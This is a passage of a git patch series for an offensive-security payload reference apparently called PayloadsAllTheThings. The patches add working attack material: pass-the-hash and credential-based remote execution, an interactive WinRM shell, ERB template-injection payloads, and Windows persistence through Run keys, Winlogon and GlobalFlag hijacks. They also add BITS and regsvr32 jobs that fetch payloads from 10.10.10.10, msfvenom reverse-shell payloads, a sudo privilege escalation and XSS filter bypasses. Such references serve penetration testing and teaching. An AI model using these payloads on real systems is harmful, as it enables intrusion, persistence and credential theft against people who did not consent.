+    ```powershell
+    Seatbelt.exe -group=all -full
+    Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
+    Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
+    ```
 - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
 - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
     ```powershell
@@ -738,6 +744,26 @@ Application running as SYSTEM allowing an user to spawn a CMD, or browse directo
 
 Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
 
+## EoP - Evaluating Vulnerable Drivers
+Look for vuln drivers loaded, we often don't spend enough time looking at this:
+
+```powershell
+PS C:\Users\Swissky> driverquery.exe /fo table
+
+Module Name  Display Name           Driver Type   Link Date
+============ ====================== ============= ======================
+1394ohci     1394 OHCI Compliant Ho Kernel        12/10/2006 4:44:38 PM
+3ware        3ware                  Kernel        5/18/2015 6:28:03 PM
+ACPI         Microsoft ACPI Driver  Kernel        12/9/1975 6:17:08 AM
+AcpiDev      ACPI Devices driver    Kernel        12/7/1993 6:22:19 AM
+acpiex       Microsoft ACPIEx Drive Kernel        3/1/2087 8:53:50 AM
+acpipagr     ACPI Processor Aggrega Kernel        1/24/2081 8:36:36 AM
+AcpiPmi      ACPI Power Meter Drive Kernel        11/19/2006 9:20:15 PM
+acpitime     ACPI Wake Alarm Driver Kernel        2/9/1974 7:10:30 AM
+ADP80XX      ADP80XX                Kernel        4/9/2015 4:49:48 PM
+<SNIP>
+```
+
 ## EoP - Runas
 
 Use the `cmdkey` to list the stored credentials on the machine.
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index eac15a9..c674732 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -14,7 +14,7 @@
 * [Crackmapexec](#crackmapexec)
 * [Winexe](#winexe)
 * [WMI](#wmi)
-* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py)
+* [Psexec.py / Smbexec.py / Wmiexec.py](#psexecpy--smbexecpy--wmiexecpy)
 * [PsExec - Sysinternal](#psexec-sysinternal)
 * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
 * [Netuse](#netuse)
@@ -93,56 +93,96 @@ shell
 
 ## Crackmapexec
 
-```python
-git clone https://github.com/byt3bl33d3r/CrackMapExec.github
-python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
-python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
-# pass the hash
-cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
+```powershell
+root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github
+root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd
+root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell
+root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami'
+root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami'
+root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami'
 ```
 
 ## Remote Code Execution with PS Credentials
 
 ```powershell
-$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force
-$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)
-Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}
+PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force
+PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)
+PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}
 ```
 
 ## WinRM
 
+Require:
+* Port **5985** or **5986** open.
+* Default endpoint is **/wsman**
+
 ```powershell
 root@payload$ git clone https://github.com/Hackplayers/evil-winrm
 root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
 root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
 ```
 
+or using a custom ruby code to interact with the WinRM service.
+
+```ruby
+require 'winrm'
+
+conn = WinRM::Connection.new( 
+  endpoint: 'http://ip:5985/wsman',
+  user: 'domain/user',
+  password: 'password',
+)
+
+command=""
+conn.shell(:powershell) do |shell|
+    until command == "exit\n" do
+        print "PS > "
+        command = gets        
+        output = shell.run(command) do |stdout, stderr|
+            STDOUT.print stdout
+            STDERR.print stderr
+        end
+    end    
+    puts "Exiting with code #{output.exitcode}"
+end
+```
+
 ## Winexe 
 
 Integrated to Kali
 
-```python
-winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
+```powershell
+root@payload$ winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
 ```
 
 ## WMI
 
 ```powershell
-wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
+PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
 ```
 
 ## Psexec.py / Smbexec.py / Wmiexec.py 
 
 from Impacket
 
-```python
-git clone https://github.com/CoreSecurity/impacket.git
-python psexec.py DOMAIN/username:password@10.10.10.10
-python smbexec.py DOMAIN/username:password@10.10.10.10
-python wmiexec.py DOMAIN/username:password@10.10.10.10
+```powershell
+root@payload$ git clone https://github.com/CoreSecurity/impacket.git
 
-# psexec.exe -s cmd
-# switch admin user to NT Authority/System
+# PSEXEC like functionality example using RemComSv
+root@payload$ python psexec.py DOMAIN/username:password@10.10.10.10
+# this will drop a binary on the disk = noisy
+
+# A similar approach to PSEXEC w/o using RemComSvc
+root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
+
+# A semi-interactive shell, used through Windows Management Instrumentation. 
+root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
+
+# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. 
+root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
+
+# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
+root@payload$ python dcomexec.py DOMAIN/username:password@10.10.10.10
 ```
 
 ## PsExec - Sysinternal
@@ -150,8 +190,10 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10
 from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
 
 ```powershell
-PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
-PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get System shell
+PS C:\> PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
+
+# switch admin user to NT Authority/System
+PS C:\> PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s 
 ```
 
 ## RDP Remote Desktop Protocol 
@@ -159,14 +201,14 @@ PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get
 Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
 
 ```powershell
-SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
+PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
 ```
 
 Or connect remotely with `rdesktop`
 
 ```powershell
-rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
-rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
+root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
+root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 # -g : the screen will take up 70% of your actual screen size
 # -r disk:share : sharing a local folder during a remote desktop session 
 ```
@@ -174,35 +216,35 @@ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 Note: you may need to enable it with the following command
 
 ```powershell
-reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
-netsh firewall set service remoteadmin enable
-netsh firewall set service remotedesktop enable
+PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
+PS C:\> netsh firewall set service remoteadmin enable
+PS C:\> netsh firewall set service remotedesktop enable
 ```
 
 or with psexec(sysinternals)
 
 ```powershell
-psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 ```
 
 or with crackmapexec
 
 ```powershell
-crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
+root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
 
 or with Metasploit
 
 ```powershell
-run getgui -u admin -p 1234
+root@payload$ run getgui -u admin -p 1234
 ```
 
 or with xfreerdp 
 
 ```powershell
-xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
-xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
-xfreerd /u:runner /v:10.0.0.1 # password will be asked
+root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
+root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
+root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 
 ## Netuse 
@@ -210,19 +252,18 @@ xfreerd /u:runner /v:10.0.0.1 # password will be asked
 Windows only
 
 ```powershell
-net use \\ordws01.cscou.lab /user:DOMAIN\username password
-C$
+PS C:\> net use \\ordws01.cscou.lab /user:DOMAIN\username password C$
 ```
 
 ## Runas 
 
 ```powershell
-runas /netonly /user:DOMAIN\username "cmd.exe"
-runas /noprofil /netonly /user:DOMAIN\username cmd.exe
+PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
+PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
 ```
 
 ## References
 
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
-- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
+- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
\ No newline at end of file

From 7670e2c36cd68663318aa2a7fd069e680f97097f Mon Sep 17 00:00:00 2001
From: meizjm3i <worker@go.com>
Date: Fri, 29 May 2020 12:28:55 +0800
Subject: [PATCH 65/85] Update ERB SSTI tips

---
 Server Side Template Injection/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 687a319..7c9956c 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine.
 
 ```ruby
 <%= system('cat /etc/passwd') %>
+<%= `ls /` %>
+<%= IO.popen('ls /').readlines()  %>
+<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
+<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```
+
+
 Execute code using SSTI for Slim engine.
 
 ```powershell

From a987b8be9faa800085c73d4b843c6b1405cd045a Mon Sep 17 00:00:00 2001
From: meizjm3i <worker@go.com>
Date: Fri, 29 May 2020 18:35:22 +0800
Subject: [PATCH 66/85] corrected a single quotation mark closure error

---
 Server Side Template Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 7c9956c..eb78c9d 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -97,7 +97,7 @@ Execute code using SSTI for ERB engine.
 <%= system('cat /etc/passwd') %>
 <%= `ls /` %>
 <%= IO.popen('ls /').readlines()  %>
-<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
+<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```
 

From 71ddb449cec40952d5f0f9450de0583d8b149636 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 1 Jun 2020 21:37:32 +0200
Subject: [PATCH 67/85] Windows Persistence

---
 API Key Leaks/README.md                       | 11 ++-
 .../Linux - Privilege Escalation.md           |  1 +
 .../Windows - Persistence.md                  | 79 ++++++++++++++++++-
 Server Side Request Forgery/README.md         |  8 ++
 4 files changed, 94 insertions(+), 5 deletions(-)

diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index 8be1b6f..b3768b0 100644
--- a/API Key Leaks/README.md	
+++ b/API Key Leaks/README.md	
@@ -16,6 +16,7 @@
     - [Twitter API Secret](#twitter-api-secret)
     - [Twitter Bearer Token](#twitter-bearer-token)
     - [Gitlab Personal Access Token](#gitlab-personal-access-token)
+    - [HockeyApp API Token](#hockeyapp-api-token)
     - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
 
 
@@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_toke
 ```
 
 
+### HockeyApp API Token
+
+```powershell
+curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
+```
+
+
 ### Auth Bypass using pre-published Machine Key
 
 > By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
@@ -125,4 +133,5 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
 
 * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
 * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
-* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
\ No newline at end of file
+* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
+* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
\ No newline at end of file
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index acc6b89..5dad4e3 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -470,6 +470,7 @@ Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/maste
 
 # If you have a full TTY, you can exploit it like this
 sudo -u#-1 /bin/bash
+sudo -u#4294967295 id
 ```
 
 ## GTFOBins
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 963d807..c1fc028 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -6,14 +6,17 @@
 * [Disable Windows Defender](#disable-windows-defender)
 * [Disable Windows Firewall](#disable-windows-firewall)
 * [Userland](#userland)
-    * [Registry](#registry)
+    * [Registry HKCU](#registry-hkcu)
     * [Startup](#startup)
     * [Scheduled Task](#scheduled-task)
+    * [BITS Jobs](#bits-jobs)
 * [Serviceland](#serviceland)
     * [IIS](#iis)
     * [Windows Service](#windows-service)
 * [Elevated](#elevated)
-    * [HKLM](#hklm)
+    * [Registry HKLM](#registry-hklm)
+        * [Winlogon Helper DLL](#)
+        * [GlobalFlag](#)
     * [Services](#services)
     * [Scheduled Task](#scheduled-task)
     * [Binary Replacement](#binary-replacement)
@@ -65,6 +68,15 @@ Value name:  Backdoor
 Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```
 
+Using the command line 
+
+```powershell
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
+```
+
 Using SharPersist
 
 ```powershell
@@ -110,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
 SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
 ```
 
+
+### BITS Jobs
+
+```powershell
+bitsadmin /create backdoor
+bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe"  "C:\tmp\evil.exe"
+
+# v1
+bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
+bitsadmin /SetMinRetryDelay "backdoor" 60
+bitsadmin /resume backdoor
+
+# v2 - exploit/multi/script/web_delivery
+bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
+bitsadmin /resume backdoor
+```
+
 ## Serviceland
 
 ### IIS
@@ -132,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
 
 ## Elevated
 
-### HKLM
+### Registry HKLM
 
 Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
 
@@ -141,6 +170,41 @@ Value name:  Backdoor
 Value data:  C:\Windows\Temp\backdoor.exe
 ```
 
+Using the command line 
+
+```powershell
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
+```
+
+#### Winlogon Helper DLL
+
+> Run executable during Windows logon
+
+```powershell
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll
+
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
+```
+
+
+#### GlobalFlag
+
+> Run executable after notepad is killed
+
+```powershell
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
+```
+
+
 ### Services
 
 Create a service that will start automatically or on-demand.
@@ -176,6 +240,8 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 | Display Switcher    | C:\Windows\System32\DisplaySwitch.exe |
 | App Switcher        | C:\Windows\System32\AtBroker.exe      |
 
+In Metasploit : `use post/windows/manage/sticky_keys`
+
 #### Binary Replacement on Windows 10+
 
 Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable.
@@ -217,4 +283,9 @@ Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administr
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
 * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
 * [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
-* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
\ No newline at end of file
+* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
+* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md)
+* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/)
+* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
+* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
+* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 964f300..84bfa50 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -407,6 +407,14 @@ gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-
 gopher://127.0.0.1:6379/_save
 ```
 
+## SSRF exploiting PDF file
+
+Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)
+
+```powershell
+<link rel=attachment href="file:///root/secret.txt">
+```
+
 ## SSRF to XSS 
 
 by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)

From bd0c6847b80d72dd9eb47f79be607b9176349ff1 Mon Sep 17 00:00:00 2001
From: Didier Arenzana <DidierA@users.noreply.github.com>
Date: Thu, 4 Jun 2020 17:26:45 +0200
Subject: [PATCH 68/85] clarification in 'bypass character filter'

added the results of echo and tr commands for clarification
---
 Command Injection/README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/Command Injection/README.md b/Command Injection/README.md
index ba3850f..5421c54 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -145,12 +145,17 @@ Commands execution without backslash and slash - linux bash
 
 ```powershell
 swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
+/
 
 swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
 root:x:0:0:root:/root:/bin/bash
 
 swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
+/
+
 swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
+/
+
 swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 root:x:0:0:root:/root:/bin/bash
 ```

From 03a0bda20d1da27f9038b5e7bdef048350d3bdce Mon Sep 17 00:00:00 2001
From: "reza.duty" <reza.duty.persian@gmail.com>
Date: Tue, 9 Jun 2020 20:05:32 +0430
Subject: [PATCH 69/85] Update README.md

---
 XSS Injection/README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 7b28ee9..2939b24 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -1062,6 +1062,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 <a href=javas&#99;ript:alert(1)>
 ```
 
+### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
+
+```javascript
+\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
+```
 
 ## References
 

From 24981f945ff62e0ee61439dfa79a013fbf55cabb Mon Sep 17 00:00:00 2001
From: bsysop <bsysop@users.noreply.github.com>
Date: Sun, 14 Jun 2020 12:08:25 -0300
Subject: [PATCH 70/85] metadata.nicob.net not long resolve to metadata IP

```
$ dig +short metadata.nicob.net
...
```

Not resolving
---
 Server Side Request Forgery/README.md | 1 -
 1 file changed, 1 deletion(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 84bfa50..38318b2 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -444,7 +444,6 @@ DNS record
 ```powershell
 http://instance-data
 http://169.254.169.254
-http://metadata.nicob.net/
 http://169.254.169.254.xip.io/
 http://1ynrnhl.xip.io/
 http://www.owasp.org.1ynrnhl.xip.io/

From 010b550dece2723febe8198608e46d1bf6ea9b91 Mon Sep 17 00:00:00 2001
From: "reza.duty" <reza.duty.persian@gmail.com>
Date: Wed, 17 Jun 2020 11:42:26 +0430
Subject: [PATCH 71/85] Update README.md

---
 XSS Injection/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 2939b24..ecb5a4d 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
   - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
   - [Bypass ">" using nothing](#bypass----using-nothing)
+  - [Bypass "<" using ＜](#bypass----using-＜)
   - [Bypass ";" using another character](#bypass-using------using-another-character)
   - [Bypass using HTML encoding](#bypass-using-html-encoding)
   - [Bypass using Katana](#bypass-using-katana)
@@ -776,6 +777,12 @@ You don't need to close your tags.
 <svg onload=alert(1)//
 ```
 
+### Bypass "<" using ＜ 
+
+```javascript
+[̕h+͓.＜script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
+```
+
 ### Bypass ";" using another character
 
 ```javascript
@@ -1135,3 +1142,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
 - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
+- [Bypass < with ＜](https://hackerone.com/reports/639684)

From ecf29c2cbe6c61261e67de657cc712f8dc245c4d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 18 Jun 2020 11:55:48 +0200
Subject: [PATCH 72/85] Active Directory - Mitigations

---
 .../Active Directory Attack.md                | 17 +++++++-
 .../Container - Docker Pentest.md             | 28 ++++++++++++-
 .../Network Pivoting Techniques.md            | 39 ++++++++++++++++++-
 Server Side Request Forgery/README.md         | 20 ++++++++++
 4 files changed, 100 insertions(+), 4 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
